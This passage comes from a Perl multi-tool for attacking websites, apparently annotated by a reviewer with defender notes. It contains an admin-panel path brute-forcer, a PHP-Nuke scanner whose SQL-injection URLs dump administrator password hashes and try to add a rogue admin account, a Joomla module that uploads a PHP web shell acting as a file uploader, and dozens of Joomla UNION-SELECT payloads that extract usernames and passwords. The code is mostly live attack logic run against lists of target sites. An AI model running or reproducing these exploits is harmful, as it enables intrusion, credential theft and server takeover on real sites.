,'cp.cfm','cp.html','cp.php','cPanel/','cpanel_file/','customer_login/','database_administration/','directadmin/','dir-login/','ezsqliteadmin/','fileadmin.asp','fileadmin.html','fileadmin.php','fileadmin/','formslogin/','globes_admin/','home.asp','home.cfm','home.html','home.php','hpwebjetadmin/','Indy_admin/','instadmin/','irc-macadmin/','LiveUser_Admin/','login.asp','login.cfm','login.html','login.php','login_db/','login1/','loginflat/','login-redirect/','login-us/','logo_sysadmin/','Lotus_Domino_Admin/','macadmin/','manuallogin/','memberadmin.asp','memberadmin.cfm','memberadmin.php','memberadmin/','members/','memlogin/','meta_login/','modelsearch/admin.asp','modelsearch/admin.cfm','modelsearch/admin.html','modelsearch/admin.php','modelsearch/index.asp','modelsearch/index.cfm','modelsearch/index.html','modelsearch/index.php','modelsearch/login.asp','modelsearch/login.cfm','modelsearch/login.html','modelsearch/login.php','moderator.asp','moderator.cfm','moderator.html','moderator.php','moderator/','moderator/admin.asp','moderator/admin.cfm','moderator/admin.html','moderator/admin.php','moderator/login.asp','moderator/login.cfm','moderator/login.html','moderator/login.php','myadmin/','navSiteAdmin/','newsadmin/','nsw/admin/login.php','openvpnadmin/','pages/admin/admin-login.asp','pages/admin/admin-login.cfm','pages/admin/admin-login.html','pages/admin/admin-login.php','panel/','panel-administracion/','panel-administracion/admin.asp','panel-administracion/admin.cfm','panel-administracion/admin.html','panel-administracion/admin.php','panel-administracion/index.asp','panel-administracion/index.cfm','panel-administracion/index.html','panel-administracion/index.php','panel-administracion/login.asp','panel-administracion/login.cfm','panel-administracion/login.html','panel-administracion/login.php','pgadmin/','phpldapadmin/','phpmyadmin/','phppgadmin/','phpSQLiteAdmin/','platz_login/','power_user/','project-admins/','pureadmin/','radmind/','radmind-1/','rcjakar/admin/login
.php','rcLogin/','Server.asp','Server.html','Server.php','server/','server_admin_small/','ServerAdministrator/','showlogin/','simpleLogin/','siteadmin/index.asp','siteadmin/index.cfm','siteadmin/index.php','siteadmin/login.asp','siteadmin/login.cfm','siteadmin/login.html','siteadmin/login.php','smblogin/','sql-admin/','ss_vms_admin_sm/','sshadmin/','staradmin/','sub-login/','Super-Admin/','support_login/','sysadmin.asp','sysadmin.html','sysadmin.php','sysadmin/','sys-admin/','SysAdmin2/','sysadmins/','system_administration/','system-administration/','typo3/','ur-admin.asp','ur-admin.html','ur-admin.php','ur-admin/','user.asp','user.html','user.php','useradmin/','UserLogin/','utility_login/','vadmind/','vmailadmin/','webadmin.asp','webadmin.cfm','webadmin.html','webadmin.php','WebAdmin/','webadmin/admin.asp','webadmin/admin.cfm','webadmin/admin.html','webadmin/admin.php','webadmin/index.asp','webadmin/index.cfm','webadmin/index.html','webadmin/index.php','webadmin/login.asp','webadmin/login.cfm','webadmin/login.html','webadmin/login.php','wizmysqladmin/','wp-admin/','wp-login.php','wp-login/','xlogin/','yonetici.asp','yonetici.html','yonetici.php','yonetim.asp','yonetim.html','yonetim.php','panel/?a=cp'
  484. );
  485.  
  # Probe loop for the "other" list: every entry of the combined @path1 is
  # appended to $site and fetched with GET; a hit is decided by body keywords.
  # This list is the longest of the four, so this branch produces the largest
  # request burst. As in the other branches, no agent string is set and LWP's
  # default "libwww-perl/<version>" User-Agent is sent.
  486. foreach $ways(@path1){
  487.  
  488. $final=$site.$ways;
  489.  
  # Fresh request and user agent per path, 30 s timeout.
  490. my $req=HTTP::Request->new(GET=>$final);
  491. my $ua=LWP::UserAgent->new();
  492. $ua->timeout(30);
  493. my $response=$ua->request($req);
  494.  
  # Only the body text is inspected, not the status code, so generic pages
  # containing these words are reported as login pages.
  495. if($response->content =~ /Username/ ||
  496. $response->content =~ /Password/ ||
  497. $response->content =~ /username/ ||
  498. $response->content =~ /password/ ||
  499. $response->content =~ /USERNAME/ ||
  500. $response->content =~ /PASSWORD/ ||
  501. $response->content =~ /Senha/ ||
  502. $response->content =~ /senha/ ||
  503. $response->content =~ /Personal/ ||
  504. $response->content =~ /Usuario/ ||
  505. $response->content =~ /Clave/ ||
  506. $response->content =~ /Usager/ ||
  507. $response->content =~ /usager/ ||
  508. $response->content =~ /Sing/ ||
  509. $response->content =~ /passe/ ||
  510. $response->content =~ /P\/W/ ||
  511. $response->content =~ /Admin Password/
  512. ){
  513. print " \n [+] Found -> $final\n\n";
  514. print " \n The Login Page Finded \n\n Good Job \n\n";
  515. }else{
  516. print "[-] Not Found <- $final\n";
  517. }
  518. }
  # NOTE(review): NULL is not a Perl keyword; with no `use strict` in the file
  # it is presumably parsed as the bareword string 'NULL'. What this call
  # actually signals is platform-dependent - confirm before relying on it.
  519. kill("STOP",NULL);
  520. }
  521. }
  # Empty menu choice (just Enter): print a usage line and exit with status 1.
  # This test sits after the branches for options 8, 9, 2, 3 and 4, so it is
  # reached only when none of those called exit first.
  522. if($targett eq '')
  523. {
  524. print "Usage: perl MultiTools.pl \n";
  525. exit(1);
  526. }
  # Menu option 7 ("PhpNuke Sql Scanner"): requests a fixed list of PHP-Nuke /
  # PostNuke URLs that carry SQL-injection strings, against a base URL typed by
  # the operator, and labels a response a hit when it contains any run of 32
  # lowercase hex digits (the shape of an MD5 hash).
  # Defender view: every probe is an ordinary GET, so it is recorded in the web
  # server access log. The query strings in @Nuke (UNION SELECT against
  # nuke_authors / nuke_users, "/**/" used as a separator) are the request
  # signatures to look for when reviewing logs or writing WAF rules.
  527. if($targett eq '7')
  528. {
  # Request suffixes appended verbatim to the target URL. Most try to pull
  # aid/pwd from nuke_authors or username/user_password from nuke_users through
  # a module parameter (cid, id, artid, secid, lid, page_id, ...).
  529. @Nuke =("modules.php?name=Downloads&d_op=viewdownload&cid=59%20or%20cid=2",
  530.                         "modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/",
  531.                         "modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors",
  532.                         "modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors",
  533.                         "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/",
  534.                         "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors",
  535.                         "modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users",
  536.                         "modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/",
  537.                         "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors",
  538.                         "modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala",
  539.                         "index.php?&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
  540.                         "modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*",
  # NOTE(review): unlike the read-style probes around it, the next entry calls
  # admin.php with op=AddAuthor and add_radminsuper=1, so it appears to attempt a
  # change on the target (adding an author) rather than only reading data. The
  # admin= value here and in the index.php entry above is Base64 for the SQL
  # fragment "x' UNION SELECT 1/*:1". When this request shows up in a log, audit
  # nuke_authors for an unexpected "x0p0x" row instead of treating it as a scan.
  541.                         "admin.php?op=AddAuthor&add_aid=x0p0x&add_name=God&add_pwd=cool&add_email=bugs@victima&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
  542.                         "modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/",
  543.                         "modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2",
  544.                         "modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2",
  545.                         "modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors",
  546.                         "modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5",
  547.                         "modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors",
  548.                         "modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201",
  549.                         "modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201",
  550.                         "modules.php?name=Sections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2",
  551.                         "modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
  552.                         "modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*","modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
  553.                         "modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2",
  554.                         "modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2",
  555.                         "modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2",
  556.                         "modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
  557.                         "modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202",
  558.                         "modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2",
  559.                         "modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors",
  560.                         "modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors",
  561.                         "modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*");
  # 'cls' is the Windows console clear command.
  562. system('cls');
  563. print "PhpNuke SQl Scanner\n";
  564. print "Enter Target (http://www.target.il/)\n";
  565. print ">>";
  # The base URL is read from <> (files named in @ARGV, otherwise STDIN) and is
  # used as typed, with no validation.
  566. my $nuketarget = <>;
  567. chomp $nuketarget;
  568.  
  569. foreach $Nuke(@Nuke){
  570. my $URLL = $nuketarget.$Nuke;
  # get() is presumably LWP::Simple's (the module is imported at the top of the
  # file); that function returns undef when the fetch fails.
  571. my $Sourcee = get $URLL;
  # NOTE(review): this guard tests $URLL, which was assigned just above and is
  # always defined, so it never fires. When triaging captured output, a
  # "NOT FOUND" line therefore does not distinguish an unreachable URL from a
  # page that returned no hash.
  572. die "Can not get $URLL" unless defined $URLL;
  # The verdict is a heuristic: any 32 lowercase hex digits anywhere in the body
  # count as a hit, so pages that legitimately contain such strings are reported
  # too. A "Vulnerability FOUND" line is not proof that credentials leaked.
  573. if ($Sourcee =~/([0-9a-f]{32})/) { $Messagee ="Vulnerability FOUND";}
  574. else { $Messagee = "NOT FOUND Vulnerability";}
  575. print "$URLL     =>    $Messagee\n";
  # "FINISH" is printed on every iteration, not once at the end of the run.
  576. print "\n \n \n \n \t \t \t \t FINISH ";
  # Every result, hit or miss, is appended to Nuke.txt in the current directory.
  # The open uses the 2-arg form with a bareword handle and is not checked.
  577. open (TEXT, '>>Nuke.txt');
  578. print TEXT "\n$URLL   =>   $Messagee \n\n";
  579. close (TEXT);
  580. }
  581. }
  # Menu option 6: read one line from STDIN and print it Base64-decoded.
  if ('6' eq $targett) {
      # Windows console housekeeping: clear the screen, then set the window title.
      system($_) for ('cls', 'title Base64 Decoder');
      print color("green"), "Enter String Base64 you want Decode:";
      chomp($decode = <STDIN>);
      # Base64 is an encoding, not encryption. The decoded bytes are written to
      # the terminal unfiltered, control sequences included.
      $zeb = decode_base64($decode);
      print " Decoded success : \n\n " . $zeb . " \n";
  }
  # Menu option 5: read one line from STDIN and print its Base64 encoding.
  if ('5' eq $targett) {
      # Windows console housekeeping: clear the screen, then set the window title.
      system($_) for ('cls', 'title Base64 Encoder');
      print color("green"), "Base64 Encoder\n";
      print " Enter String:";
      chomp($hash = <STDIN>);
      # encode_base64 appends its own line ending, which is kept in the output.
      # The result is an encoding only and offers no confidentiality.
      $t = encode_base64($hash);
      print "Encoded Succes : \n\n " . $t . " \n";
  }
  605. if($targett eq '1')
  606. {
  607. system('cls');
  608. print color("green"),"\n[1] Joomla RCI Scanner\n";
  609. print color("green"), "[2] Joomla SQL Scanner\n";
  610. print color("green"), "[3] Joomla LFI Scanner\n";
  611. print color("green"), "[4] Joomla RFI Scanner\n";
  612. print color("green"), "[5] Joomla JCE Vuln\n";
  613. print color("green"), "\nChoose Number :";
  614. my $c = <>;
  615. chomp $c;
  # Joomla sub-option 1 ("RCI"): for every host in an operator-supplied list
  # file, POSTs a PHP page to the Open Flash Chart helper ofc_upload_image.php
  # bundled with six Joomla components, then checks whether that page became
  # reachable under the matching tmp-upload-images/ directory.
  # Defender view - indicators visible in this block:
  #   * POST to .../php-ofc-library/ofc_upload_image.php?name=tt7.php with
  #     Content-Type text/plain
  #   * a file named tt7.php inside a .../tmp-upload-images/ directory
  #   * a served page containing <title>Evil Upload</title>
  # Mitigation: remove or update the bundled ofc_upload_image.php in the listed
  # components and deny script execution in upload directories.
  616. if($c eq '1')
  617. {  #Script Original Coded by M-A Labz
  618. system('cls');
  619. system('title Joomla Component RCI scanner');
  620. print color("bold red"),"\n[+]Joomla Components RCI Exploits Scanner \n";
  621. print color 'reset';
  622. print color("green"),"[+] Enter File (List of site file) : ";
  623. print color 'reset';
  624. $file=<STDIN>;
  625. chomp($file);
  # 2-arg open with the typed name interpolated after the mode character, on a
  # bareword handle; the whole list is read into memory before the scan starts.
  626. open (file, "<$file") || die "[-] Can't open the List of site file !";
  627. my @file = <file>;
  628. close file;
  629. foreach $webs (@file)
  630. {
  631. chomp $webs;
  632. $site = $webs;
  633. print color("green"), "[+] Scanning $site\n";
  634. print color 'reset';
  # Upload endpoints, one per component: com_civicrm, com_acymailing,
  # com_jnewsletter, com_jinc, com_maianmedia, com_jnews.
  635. @paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
  636. foreach $path(@paths)
  637. {
  # Plain http is used. The name= parameter presumably sets the filename the
  # helper stores, since tt7.php is what the later probe looks for.
  638. $site_vul = "http://".$site."".$path."?name=tt7.php";
  # $data is the request body: the literal text "php code", a title/heading
  # marker, and PHP that prints php_uname() and offers a form which copies an
  # uploaded file into the script's working directory under the client-supplied
  # name. In effect it is an arbitrary file uploader, not a passive check.
  639. $data = "php code";
  640. $data.= ' <title>Evil Upload</title> ';
  641. $data.= ' <h1>Evil Upload</h1> ';
  642. $data.= '<?php ';
  643. $data.= "echo '<b><br><br>'.php_uname().'<br></b>'; ";
  644. $data.= 'echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; ';
  645. $data.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; ';
  646. $data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";
  647. $data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } ";
  648. $data.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } ";
  649. $data.= " } ";
  650. $data.= "?>";
  # NOTE(review): $ua is not assigned anywhere in the visible part of the file;
  # presumably an LWP::UserAgent created elsewhere - confirm. POST is presumably
  # the HTTP::Request::Common helper imported at the top of the file.
  651. $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);
  # is_success only means the endpoint answered with a 2xx status, so the
  # "is vul" line is printed before any stored file has been confirmed.
  652. if ($res->is_success){
  653. print color("green"), "[+] $site is vul\n";
  654. print color 'reset';
  # Locations where the stored file would appear, again one per component. All
  # six are requested regardless of which upload endpoint answered.
  655. @vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');
  656. foreach $vul(@vulns)
  657. {
  658. $url = "http://".$site. $vul;
  659. $request = HTTP::Request->new(GET=>$url);
  660. $useragent = LWP::UserAgent->new();
  661. $response = $useragent->request($request);
  # Confirmation is the marker title written into the uploaded page above.
  662. if ($response->content=~m/<title>Evil Upload<\/title>/g){
  663. print color("green"), "[+] Found => $url\n\n";
  664. print color 'reset';
  # Hits are appended to result-<site>.txt. $site comes straight from the list
  # file and is interpolated into the filename unchecked; the open is 2-arg and
  # its result is not tested.
  665. open(BEN,">>result-$site.txt");
  666. print BEN "$url\n";
  667. close(BEN);
  668. }else{
  669. print "[-] Not Found \n";
  670. }
  671. }
  672. }
  673. }
  674. }
  675. }
  676. if($c eq '2')
  677. {
  678. system('cls');
  679. system('title Joomla Sql Scanner');
  680. ###xpl###
  681. $com_jeajaxeventcalendar="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
  682. $com_storedirectory="UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users";
  683. $com_annuaire="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
  684. $com_maianmedia="+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--";
  685. $com_alfurqan15x="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
  686. $com_markt="+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--";
  687. $com_sponsorwall="+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--";
  688. $com_flipwall="+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--";
  689. $jedirectory="+1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),4,5,6,7,8,9,10,11+from+jos_users+where+id=userid--";
  690. $com_ezautos="+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--";
  691. $com_arash="+and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users";
  692. $com_taxes="+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--";
  693. $com_vat="+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--";
  694. $com_blogs="/**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--";
  695. $com_gr="+union+select+1,concat(username,0x3a,password)+from+jos_users--";
  696. $com_simpleshop="UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--";
  697. $com_youtube="union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--";
  698. $com_joomdle="-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz";
  699. $com_itaromry="?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+";
  700. $com_iproperty="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
  701. $com_huruhelpdesk="/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--";
  702. $com_jomtube="+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
  703. $com_spa="%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--";
  704. $com_staticxt="+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users";
  705. $com_ybggal="+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--";
  706. $com_quran="/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--";
  707. $com_konsultasi="/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--";
  708. $com_newsfeeds="%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--";
  709. $wapmain="+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--";
  710. $com_abc="+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--";
  711. $com_joomradio="+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--";
  712. $com_jtm="/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search";
  713. $com_gbufacebook="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz";
  714. $com_manager="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
  715. $com_jp_jobs="/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--";
  716. $com_sermonspeaker="/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/";
  717. $com_jdrugstopic="+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--";
  718. $com_mv_restaurantmenumanager="+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users";
  719. $com_articles="+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—-";
  720. $com_dcs_flashgames="+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--";
  721. $com_bidding="+UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--";
  722. $com_acteammember="+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en";
  723. $com_acstartseite="+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&#9001;=de";
  724. $com_productbook="+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--";
  725. $com_yelp="+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users--";
  726. $com_dms="+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--";
  727. $com_jbpublishdownfp="+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users";
  728. $com_casino="+union+all+select+1,username,password,4,5+from+jos_users/*";
  729. $com_doqment="/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--";
  730. $com_alfresco="/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--";
  731. $com_countries="/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users";
  732.  
  733.  
  734.  
  735.  
  736. print color("green"),"\nTarget page: http://wwww.site.com/ : ";
  737. chomp(my $target=<STDIN>);
  738.  
  739. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  740. $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
  741. $host = $target . "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-999 .$com_jeajaxeventcalendar.";
  742. $res = $b->request(HTTP::Request->new(GET=>$host));
  743. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
  744. print "[*] Results : CHECK : \n";
  745. print "Joomla JE Ajax Event Component (com_jeajaxeventcalendar) SQL Injection Vulnerability ! \n\n";
  746. }
  747. else{print "\n[-] Error\n";
  748. }
  749.  
  750. $host = $target . "/index.php?option=com_storedirectory&task=view&id=-999 .$com_storedirectory.";
  751. $res = $b->request(HTTP::Request->new(GET=>$host));
  752. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
  753. print "[*] Results : CHECK : \n";
  754. print "Joomla Component (com_storedirectory) SQL Injection Vulnerability ! \n\n";
  755. }
  756. else{print "\n[-] Error\n";
  757. }
  758.  
  759. $host = $target . "/index.php?option=com_annuaire&view=annuaire&type=cat&id=-999 .$com_annuaire.";
  760. $res = $b->request(HTTP::Request->new(GET=>$host));
  761. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  762. print "[*] Results : CHECK : \n";
  763. print "Joomla (com_annuaire) SQL Injection Vulnerability ! \n\n";
  764. }
  765. else{print "\n[-] Error\n";
  766. }
  767.  
  768. $host = $target . "/index.php?option=com_maianmedia&view=music&cat=-999 .$com_maianmedia.";
  769. $res = $b->request(HTTP::Request->new(GET=>$host));
  770. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  771. print "[*] Results : CHECK : \n";
  772. print "Joomla Component (com_maianmedia) SQL Injection Vulnerability ! \n\n";
  773. }
  774. else{print "\n[-] Error\n";
  775. }
  776.  
  777. $host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999 .$com_alfurqan15x.";
  778. $res = $b->request(HTTP::Request->new(GET=>$host));
  779. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  780. print "[*] Results : CHECK : \n";
  781. print "Joomla Component (com_alfurqan15x) SQL Injection Vulnerability ! \n\n";
  782. }
  783. else{print "\n[-] Error\n";
  784. }
  785.  
